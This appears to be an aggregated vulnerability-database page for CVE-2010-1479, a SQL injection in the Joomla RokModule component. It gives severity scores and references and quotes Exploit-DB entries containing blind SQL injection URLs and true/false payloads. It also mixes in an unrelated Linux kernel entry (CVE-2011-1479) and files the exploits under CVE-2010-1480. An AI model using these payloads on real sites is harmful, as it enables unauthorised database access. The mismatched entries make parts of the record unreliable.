CVE-2010-1479
Published 2010-04-19
Priority P3 · 47 · high · 7.5 CVSS 2.0
AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 2.31% (81.2th percentile)
SQL injection vulnerability in the RokModule (com_rokmodule) component 1.1 for Joomla! allows remote attackers to execute arbitrary SQL commands via the moduleid parameter in a raw action to index.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| rockettheme | com_rokmodule | — | — |
CVSS provenance
nvd · v2.0 · 7.5 HIGH · AV:N/AC:L/Au:N/C:P/I:P/A:P
vendor_redhat · 4.9 MEDIUM
GHSA
GHSA-f7qx-6327-qgwq: SQL injection vulnerability in the RokModule (com_rokmodule) component 1
ghsa_unreviewed·2022-05-17
CVE-2010-1479 [HIGH] CWE-89 GHSA-f7qx-6327-qgwq: SQL injection vulnerability in the RokModule (com_rokmodule) component 1
Red Hat
kernel: DoS (crash) due slab corruption in inotify_init1 (incomplete fix for CVE-2010-4250)
vendor_redhat·2011-04-05·CVSS 4.9
CVE-2011-1479 [MEDIUM] kernel: DoS (crash) due slab corruption in inotify_init1 (incomplete fix for CVE-2010-4250)
Double free vulnerability in the inotify subsystem in the Linux kernel before 2.6.39 allows local users to cause a denial of service (system crash) via vectors involving failed attempts to create files. NOTE: this vulnerability exists because of an incorrect fix for CVE-2010-4250.
Statement: This issue did not affect the versions of Linux kernel as shipped with Red Hat Enterprise Linux 4 and 5. This has been addressed in Red Hat Enterprise Linux 6 and Red Hat Enterprise MRG via https://rhn.redhat.com/errata/RHSA-2011-0498.html and https://rhn.redhat.com/errata/RHSA-2011-1253.html.
Package: kernel (Red Hat Enterprise Linux 6) - Affected
Package: kernel (Red Hat Enterprise Linux Extended Update Su
No detection rules found.
Exploit-DB
Joomla! Component RokModule 1.1 - 'module' Blind SQL Injection
exploitdb·2012-09-10
CVE-2010-1480 Joomla! Component RokModule 1.1 - 'module' Blind SQL Injection
---
Title: Joomla Component RokModule Blind SQLi [module] Vulnerability
Component name: Com_rokmodule
Company: http://www.rockettheme.com/
Tested on: Linux Backtrack
Author: Yarolinux for WebSecurityDev
Twitter: @Yarolinux
Date: 09/09/2012
Well, the injection goes as follows:
http://localhost/index.php?option=com_rokmodule&tmpl=component&type=raw&module=[sqli]
http://localhost/web/index.php?option=com_rokmodule&tmpl=component&type=raw&module=[sqli]or[BlindSQLi]
OK! That's all. Enjoy it!
We are working in a lab, testing it on Joomla 1.7. Results very soon :D
Greetz: Dylan Irzi & WebSecurityDev
Exploit-DB
Joomla! Component RokModule 1.1 - 'moduleid' Blind SQL Injection
exploitdb·2010-04-11
CVE-2010-1480 Joomla! Component RokModule 1.1 - 'moduleid' Blind SQL Injection
---
[o] Joomla Component RokModule Blind SQLi [moduleid] Vulnerability
Software : com_rokmodule version 1.1
Vendor : http://www.rockettheme.com/
Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
Contact : public[at]antisecurity[dot]org
Home : http://antisecurity.org/
[o] Exploit
http://localhost/[path]/index.php?option=com_rokmodule&tmpl=component&type=raw&offset=_OFFSET_&moduleid=[BSQLi]
[o] PoC
http://localhost/[path]/index.php?option=com_rokmodule&tmpl=component&type=raw&offset=_OFFSET_&moduleid=140+AND+SUBSTRING(@@version,1,1)=5 << true
http://localhost/[path]/index.php?option=com_rokmodule&tmpl=component&type=raw&offset=_OFFSET_&moduleid=140+AND+SUBSTRING(@@version,1,1)=4 << false
[o] Greetz
References
http://packetstormsecurity.org/1004-exploits/joomlarokmodule-bsql.txt
http://secunia.com/advisories/39255
http://www.exploit-db.com/exploits/12148
http://www.rockettheme.com/extensions-downloads/free/rokmodule/1040-rokmodule-component/download
http://www.rockettheme.com/extensions-updates/673-rokmodule-security-update-released
http://www.securityfocus.com/bid/39378
Published: 2010-04-19